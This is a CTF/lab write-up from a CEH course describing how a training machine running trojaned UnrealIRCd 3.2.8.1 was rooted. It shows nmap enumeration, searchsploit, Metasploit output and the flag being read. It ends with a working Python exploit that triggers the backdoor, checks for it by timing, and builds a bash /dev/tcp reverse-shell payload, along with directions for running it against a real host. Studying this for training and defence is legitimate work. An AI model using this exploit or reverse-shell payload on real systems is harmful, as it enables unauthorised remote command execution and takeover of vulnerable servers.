Maq 106

May 12, 2018 · Jeff Soczek · 4 min read

This was one of the first machines done during the CEH course. The virtual machine available in my classes was a copy of one that already existed in the lab, so when I finally got access to the lab I merely replicated the actions done in the VM, and that let the machine's description in the lab pass unnoticed. Had I done a decent job during the enumeration phase, I wouldn't have lost time later looking for a machine with the resources I needed. Were this the OSCP exam, I'd be in trouble.

So one of the lessons learned here: information gathering, footprinting and scanning must be done really well, because it saves time later on.

Maq106 – MACHINE

Description: Try to discover the vulnerability point(s) of this machine and capture the flag!

The machine may hide interesting secrets for compromising other machines in the Pentest Lab.

Let's start by seeing what we are dealing with. I have an IP address and nothing else, so I'll look for the running OS and for any open ports.

root@parrot:~# nmap -O -sV
Nmap scan report for
Host is up (0.0071s latency).
Not shown: 994 closed ports
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND 9.5.1-P3
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 20.90 seconds

Good enough: it's a Debian box and we have a few well-known services running there. The odd one out is the IRC daemon, so that is the one I'll start poking at.

root@parrot:~# locate *.nse | grep irc

There is a script for the very IRC server we have. Let's see what irc-unrealircd-backdoor.nse can show us.

root@parrot:~# nmap -p6667 --script irc-unrealircd-backdoor.nse
Nmap scan report for
Host is up (0.0075s latency).
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See
Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds

Right, the service is vulnerable. Note the cautious wording, "Looks like": the script has no way to read command output over IRC, so it confirms the backdoor by making the server run a timed command and measuring the delay. It is a blind check, which is worth remembering for the exploitation step. Before proceeding, let me check the IRC service version.

root@parrot:~# nmap -p6667 --script irc-info.nse
Nmap scan report for
Host is up (0.039s latency).
6667/tcp open irc
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server:
| version: Unreal3.2.8.1.
| uptime: 1 days, 5:14:01
| source ident: nmap
| source host: 5970F2CA.18AECCC8.1C965CCA.IP
|_ error: Closing Link: ijfqofavr[] (Quit: ijfqofavr)
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

We already had the service name; now we have the version too: Unreal3.2.8.1, the release whose download tarball was shipped with the backdoor. Let's check if we already have an exploit ready for this version.

root@parrot:~# searchsploit unrealirc
------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
UnrealIRCd - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd - Remote Downloader/Execute | exploits/linux/remote/
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/
------------------------------------------------------------- ----------------------------------------

I'll cut to the chase and go straight to Metasploit, pick the module matching the entry shown above and set its options.

root@parrot:~# service postgresql start
root@parrot:~# msfconsole
msf > search unrealirc
Matching Modules
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD Backdoor Command Execution
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST

Ready to run the exploit. The module connects to the IRC port, sends the backdoor trigger with a command that calls back to my listener, and the double handler then works out which of the two callback connections is the shell's input; that is what the "echo …" and "Matching..." lines below are about.

msf > exploit
[*] Started reverse TCP double handler on
[*] - Connected to NOTICE AUTH :*** Looking up your hostname... NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ealfLbzJRfkl7r18;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ealfLbzJRfkl7r18\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2018-04-24 09:21:40 -0300
cat /root/flag.txt

With the exploit finished, I typed whoami to check who I was: root. I then read the flag.txt content (what is shown here is not the real one), but the point is that the machine is owned. You can do anything from here: list the other users and their password hashes, or look for other networks this machine can reach…
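What the module just did, by hand. This is an added example of my own, not code from the post or from Metasploit. It relies on how the trojaned 3.2.8.1 daemon is known to work: the read loop checks whether a received line starts with "AB" and, if so, passes the whole line to system(), synchronously. Two consequences follow, both visible in the output above: nothing comes back over IRC (hence the reverse shell, and the double handler's "echo …" / "Matching..." lines that only sort out which callback socket is the shell's input), and the single-threaded daemon stalls for as long as the injected command runs, which is the timing side channel the nmap script uses. The FakeUnreal server in the block is a constructed stand-in so the client side can run offline; `trigger()` and `is_backdoored()` are meant to be pointed at a real host and port, and `reverse_shell_command()` assumes bash on the target and a listener such as `nc -lvp 4444` on your side. Host, port and listener addresses in the demo are made up.

```python
"""Manual use of the Unreal3.2.8.1 backdoor (added example, see lead-in).
The trojan hands any received line starting with "AB" to system():
execution is blind (no output over IRC) and synchronous, so the
single-threaded daemon stalls until the command ends. FakeUnreal is a
constructed stand-in so this file runs offline."""
import socket
import socketserver
import threading
import time

# The daemon checks for "AB"; the ";" just makes the shell move on to our command.
TRIGGER = b"AB;"

def _read_until(sock, stop, timeout):
    """Read until `stop` is seen (or, if stop is None, until the peer
    closes). A timeout simply ends the read. Returns the bytes read."""
    sock.settimeout(timeout)
    data = b""
    try:
        while stop is None or stop not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    except socket.timeout:
        pass
    return data

def trigger(host, port, command, timeout=10.0):
    """Run `command` through the backdoor and return the line sent. The
    daemon only sees our EOF after system() returns, so waiting for it to
    close the link means the command has finished."""
    line = TRIGGER + command.encode() + b"\n"
    with socket.create_connection((host, port), timeout=timeout) as s:
        _read_until(s, b"\n", timeout)  # wait for the NOTICE AUTH banner
        s.sendall(line)
        s.shutdown(socket.SHUT_WR)      # our EOF makes the daemon close the link
        _read_until(s, None, timeout)   # ...so wait for that close
    return line

def is_backdoored(host, port, delay=3, timeout=15.0):
    """Timing check in the spirit of irc-unrealircd-backdoor.nse: inject
    `sleep <delay>` on one connection and time how long a second connection
    waits for its banner. A clean server answers at once; a trojaned one is
    stuck inside system() for `delay` seconds."""
    with socket.create_connection((host, port), timeout=timeout) as a:
        _read_until(a, b"\n", timeout)
        a.sendall(TRIGGER + b"sleep %d\n" % int(delay))
        start = time.monotonic()
        with socket.create_connection((host, port), timeout=timeout) as b:
            _read_until(b, b"\n", timeout)
        elapsed = time.monotonic() - start
    return elapsed >= 0.7 * delay

def reverse_shell_command(lhost, lport):
    """Payload for trigger(): a bash reverse shell (assumes bash on the
    target; catch it with `nc -lvp <lport>` on lhost)."""
    return f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"

class _Handler(socketserver.StreamRequestHandler):
    timeout = 10

    def handle(self):
        self.wfile.write(b"NOTICE AUTH :*** Looking up your hostname...\r\n")
        line = self.rfile.readline()
        if self.server.backdoored and line.startswith(TRIGGER):
            cmd = line[len(TRIGGER):].rstrip(b"\r\n").decode()
            self.server.seen.append(cmd)
            self.server.executor(cmd)  # blocks the whole daemon, like system()

class FakeUnreal(socketserver.TCPServer):
    """Constructed single-threaded stand-in for the daemon; with
    backdoored=True it mimics the trojan, `executor` stands in for system()."""
    allow_reuse_address = True

    def __init__(self, backdoored, executor):
        self.backdoored, self.executor, self.seen = backdoored, executor, []
        super().__init__(("127.0.0.1", 0), _Handler)

def fake_system(cmd):
    """Safe stand-in for system(): honours only `sleep N`, ignores the rest."""
    parts = cmd.split()
    if len(parts) == 2 and parts[0] == "sleep":
        time.sleep(float(parts[1]))

def start_fake(backdoored):
    """Start a FakeUnreal on an ephemeral port (in a thread) and return it."""
    srv = FakeUnreal(backdoored, fake_system)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

if __name__ == "__main__":
    srv = start_fake(backdoored=True)
    host, port = srv.server_address
    print("backdoored:", is_backdoored(host, port, delay=2))
    print("sent:", trigger(host, port, reverse_shell_command("10.0.0.1", 4444)))
    print("daemon ran:", srv.seen)
    srv.shutdown()
```

Against a real target you would run `is_backdoored(ip, 6667)` first, start the listener, then `trigger(ip, 6667, reverse_shell_command(my_ip, 4444))`; the shell lands on the listener, not on the IRC socket, which is the whole reason the blind timing check exists.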